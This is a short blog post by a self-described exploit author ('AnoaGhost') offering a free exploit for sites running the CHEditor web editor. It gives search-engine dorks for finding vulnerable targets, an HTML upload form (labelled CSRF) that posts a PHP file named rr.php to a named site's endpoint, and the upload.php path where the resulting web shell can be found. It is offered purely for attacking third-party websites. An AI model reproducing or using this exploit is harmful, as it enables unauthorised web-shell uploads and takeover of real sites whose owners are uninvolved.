Shiro Tenshi On 16/03/17



Hello again, this is new priv8 exploit from me,
i share now, is free now, not from other author in exploit-db or 0day or other forum, this is exploit from me

Author : Me (AnoaGhost)

Dork :
- inurl:/cheditor/js/
- inurl:/editor/cheditor/

CSRF :
<form method="post" action="http://www.buddycaster.com/wp-admin..." enctype="multipart/form-data">
<input type="file" name="file"/>
<input type="hidden" name="name" value="rr.php" />
<input type="submit" value="submit"/>
</form>

Path :
- site.co.kr/plugin/editor/cheditor/imageUpload/upload.php
- Find other

Shell Uploaded :
* you will found it if your target is success to exploited, so follow the path shell...

Leave a Reply

Subscribe to Posts | Subscribe to Comments